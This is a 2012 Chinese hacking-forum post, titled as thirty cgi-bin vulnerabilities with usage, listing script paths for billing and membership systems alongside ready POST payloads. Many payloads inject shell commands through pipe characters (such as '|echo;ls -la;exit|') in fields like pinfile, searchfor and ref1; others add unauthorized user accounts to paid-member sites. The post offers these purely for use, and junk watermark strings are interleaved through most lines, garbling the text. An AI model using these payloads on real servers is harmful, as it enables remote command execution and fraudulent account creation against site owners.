找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2580|回复: 0
打印 上一主题 下一主题

Cgi-bin 30个漏洞+使用方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:55:26 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
==============================# u- K* l- E  [+ J9 H% w9 K
* W/ j* B8 g9 e0 q# ]' S( s5 P
/smspass.pl; \: M: p' _8 Q7 p, v8 Z7 z8 N
username=username&password=password2 c3 c4 Q* v! z2 D/ x# |
! l( x# z# x5 F. I1 y
/index.cgi
2 O4 ~1 g3 W) `2 Awei=ren&gen=command# D6 @. S* |8 k5 S3 q2 A
1 H6 n3 D6 g! a& S4 c% l
/passmaster.cgi
! w9 z; p' u; y# [) N  z2 tAction=Add&Username=Username&Password=Password. U* q9 |) g' m

3 R6 ~7 X% L0 K( _/accountcreate.cgi
7 i& A! r$ K& w, o2 Dusername=username&password=password&ref1=|echo;ls|- g+ N+ d1 I8 n! S$ x6 J
# G) p  Q$ ^7 R" ^: b$ D: @& j
/form.cgi
9 v) _+ s/ z. [6 y6 u% @name=xxxx&email=email&subject=xxxx&response=|echo;ls|
$ d. u0 C+ H  V8 o# A* p2 f0 ]) x" }
/addusr.pl0 K' C; ?7 m" m: f4 U( F4 L
/cgi-bin/EuroDebit/addusr.pl
- a* r; l3 D, @" xuser=username&pass=Password&confirm=Password
8 T) a. H3 M1 u8 O
/ q  a9 o$ D2 d+ l  W5 |0 ]9 z/ccbill-local.asp
2 h2 Z! s( F% |: B4 ~( [% apost_values=username:password
- _; V. p$ Y- l' W( f5 |
8 E% S& d0 v' o4 B' ^" d& D$ O7 m0 d5 O/count.cgi
1 ~* o0 |1 ]2 ~- ipinfile=|echo;ls -la;exit|+ |3 @1 I3 P9 {/ z1 g5 i  z4 x
  B! M& E7 R1 J
/recon.cgi
% I$ v, n2 E- ~3 f/ D4 C$ d) q/recon.cgi?search, J2 [7 |: B/ z7 K+ s" R
searchoption=1&searchfor=|echo;ls -al;exit|) B: C0 S4 m, f$ V; E$ v: Q

: ~$ z0 w; H! A' k* Q/verotelrum.pl) X$ D! I2 C* s5 K6 p
vercode=username:password:dseegsow:add:amount<&30>
8 T% n) H. }& x, Z' c, ^! s" X  `/ i  v+ w) u( r$ A3 ~
/af.cgi, u5 \3 T* P/ c/ S: W. @' P2 M% i
_browser_out=|echo;ls -la;exit;|) X7 r3 J, e; b" S0 o8 v4 e

5 d2 L9 v% ]+ m4 K, A( F/modify.cgi4 E( w( u1 M& a, N" w8 j4 D
username=username&password=password&expire=30
' B: j5 L5 z4 j2 ~- P# ?$ j
/ j% F- U. P2 M7 D6 w/openjournal.cgi  F1 S& ]7 N- c  q) R- h8 D
edit=1&ct=2&go=|echo;ls -al;exit|. s2 X: t1 V1 F( P6 l5 ^+ {
* D6 `. u& Y9 d2 o
/gx9passwd.cgi4 s+ D5 D/ q) s% `8 q$ W5 Z
cmd=ADD&user=username&pass=password
: p4 ^/ J7 K) Y$ F6 G# V+ M5 I4 f" L/ x& ]# R
/probecontrol.cgi
- j7 B8 v7 R* O- pcommand=enable&username=username&password=password
# t' U$ l% {; _. M
; g' w6 W, n2 q$ Y7 T/recon.cgi
; E! P; Q( H2 x! p6 ^6 F9 B$ O! msearchoption=3&searchfor=echo;ls -la;exit. a! w, A* E2 V4 S
* B% T& a6 M0 J9 Z
/htadd.pl0 l6 B$ r+ A! K8 w* }! H
configfile=|echo; ls -alt; exit
9 l6 d7 _& P- ]# J: P9 S
7 @. d9 x9 Y2 |1 E/gx9passwd.cgi
! P1 O2 V/ c( w, C. v' Dcmd=ADD&user=username&pass=password
( ~% P; h2 X( H- L" C; s( v+ O" [- j) b2 k9 u
/ibill*.pl+ {6 G( E! S: l* L, B3 e) z9 L
reqtype=add&authpwd=authpwd&username=username&password=password
, P3 A7 O- L  p- Z$ Y! S1 N1 x9 D5 _
; b: _; x$ t) n) w2 b- j7 {/cpay.cgi
2 z8 p9 i& @; L  H& {4 i0 tcommand=add_member&username=username(EMAIL)&password=password(DES)0 r4 @7 j- |4 r: _$ H: I

; P4 X6 D' W4 |' A4 p' `  E/globill_ut.cgi  K* |* t- |8 s' f* N
do=add&username=username&password=password&wpassword=password) G! C* _+ c+ M" g$ n% o- W
/ T2 @; s$ l3 m7 M  n& A0 n
/usercontrol.cgi
' S3 p" {8 C5 lcommand=enable&username=USER&password=PASS
) b2 K+ t; k5 s0 I( M! o( M- f9 C2 U1 W/ V5 w
/globoSALErum.cgi
& q; {. l9 L8 B7 ?action=ADD&seccode=seccode&login=username&password=password( u. e# Z0 B5 W9 y( B) A9 c

# O: ], r$ J0 i+ V4 M+ `/ f  ^/addusr.pl
- v- D3 e! _# M5 Huser=USER&pass=PASS&confirm=PASS
# A8 _! M0 n3 k+ d, J2 X( S, ]: Y' d  A. A4 Y* j* e0 E
/pincount.cgi
! t9 a' }% Q+ _7 B8 R* D2 d+ w$ B/cgi-bin/mastergate/pincount.cgi
' w, P( V& D6 Cpinfile=|echo;pwd;exit|
4 b! w: L( o) c, Z
% X2 K- q) P8 G( M) q/accountcreate.cgi
7 n$ x8 q. ~$ U  F/cgi-bin/gateway/accountcreate.cgi  F3 u& N+ M: S( b0 q
username=username&password=password&password2=password&ref1=|echo;ls -al;exit
8 l) N* h% q% {. l$ X+ B$ y+ J5 y9 ^9 q+ U, y1 y) C# v
/af.cgi
* L7 y" }! {2 G+ u$ u2 c/env.cgi- j& `8 {/ t/ E- c. m% w, u
ADD+;echo;pwd;exit' @; J8 M( c) S  G' g: S" ~
/ W# Y" w1 }- V0 z
/count.cgi) q$ V7 B1 E- K! C/ S' k5 }
pinfile=|echo;pwd;exit|) Y- V" Q. l& |. Q+ D2 E
1 `: @3 C( A; X7 ^- c% J
/recon.cgi( `) t$ a- r. L( V' e
searchoption=1&searchfor=|echo;ls%20-al;exit|3 c' T7 B" g6 J7 K
5 ]+ Y# a. F  Z* `/ m
/add.cgi3 x/ N( t! t5 q
username=username&password=password&expire=30
6 o6 p7 J. c, R% {" X( Z& G/ _8 Q' `1 k
==============================
: ?- D3 {! O5 S6 W# D, g% W. S
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表